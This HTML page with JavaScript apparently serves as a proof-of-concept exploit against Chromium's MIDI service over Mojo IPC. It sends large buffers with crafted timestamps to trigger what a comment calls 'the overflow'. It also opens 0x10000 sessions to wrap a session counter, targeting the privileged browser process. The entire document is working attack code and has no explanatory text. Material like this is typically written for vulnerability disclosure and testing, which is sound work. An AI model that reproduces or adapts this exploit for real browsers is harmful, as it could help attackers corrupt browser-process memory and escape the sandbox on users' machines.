<html>
  <body>
    <script src="/mojo_bindings.js"></script>
    <script src="/media/midi/midi_service.mojom.js"></script>
    <script>
var id = 0;

var session_provider_ptr = new midi.mojom.MidiSessionProviderPtr();
Mojo.bindInterface(midi.mojom.MidiSessionProvider.name,
                   mojo.makeRequest(session_provider_ptr).handle, "process");

var session_client;
var session_client_ptr;

var session_ptr = null;
var session_request;

var base = 0;
var delta = 0x8000000;
var sent = true;

function MidiSessionClientImpl() {
  this.binding = new mojo.Binding(midi.mojom.MidiSessionClient, this);
}

MidiSessionClientImpl.prototype = {
  addInputPort: async (arg0) => {
  },
  addOutputPort: async (arg0) => {
  },
  setInputPortState: async (arg0, arg1) => {
  },
  setOutputPortState: async (arg0, arg1) => {
  },
  sessionStarted: async (arg0) => {
    window.setTimeout(send_data, 100);
  },
  acknowledgeSentData: async (arg0) => {
    base += delta;
    sent = true;
  },
  dataReceived: async (arg0, arg1, arg2) => {
  }
};

function WrapClientImpl() {
  this.binding = new mojo.Binding(midi.mojom.MidiSessionClient, this);
}

WrapClientImpl.prototype = {
  addInputPort: async (arg0) => {
  },
  addOutputPort: async (arg0) => {
  },
  setInputPortState: async (arg0, arg1) => {
  },
  setOutputPortState: async (arg0, arg1) => {
  },
  sessionStarted: async (arg0) => {
  },
  acknowledgeSentData: async (arg0) => {
  },
  dataReceived: async (arg0, arg1, arg2) => {
  }
};

var bytes = new Uint8Array(1024 * 1024);
for (var i = 0; i < 1024 * 1024; ++i) {
  bytes[i] = 0xf8;
}

function wait() {
  window.setTimeout(wait, 100);
}

function wrap() {
  for (var i = 0; i < 0x100; ++i) {
    session_client.binding.bind(mojo.makeRequest(session_client_ptr));
    session_request = mojo.makeRequest(session_ptr);

    id = id + 1;

    session_provider_ptr.startSession(session_request, session_client_ptr);
  }

  if (id == 0x10000) {
    session_client.binding.bind(mojo.makeRequest(session_client_ptr));
    session_request = mojo.makeRequest(session_ptr);

    id = id + 1;

    session_provider_ptr.startSession(session_request, session_client_ptr);

  wait();
  } else {
    window.setTimeout(wrap, 1);
  }
}

function send_data() {
  var timestamp = new mojoBase.mojom.TimeTicks();
  timestamp.internalValue = base;

  if (!sent) {
    timestamp.internalValue = base + (delta * 2);
  // we do another send here to make sure that even if this was "only just" past,
  // we have enough time to cause the overflow.
    session_ptr.sendData(0, bytes, timestamp);
    session_client = new WrapClientImpl();
    wrap();
    return;
  }

  var timestamp = new mojoBase.mojom.TimeTicks();
  timestamp.internalValue = base;
  session_ptr.sendData(0, bytes, timestamp);
  sent = false;
  window.setTimeout(send_data, 500);
}

function sync_clocks() {
  session_client = new MidiSessionClientImpl();
  session_client_ptr = new midi.mojom.MidiSessionClientPtr();
  session_client.binding.bind(mojo.makeRequest(session_client_ptr));

  session_ptr = new midi.mojom.MidiSessionPtr();
  session_request = mojo.makeRequest(session_ptr);

  session_provider_ptr.startSession(session_request, session_client_ptr);
}

sync_clocks();
    </script>
  </body>
</html>
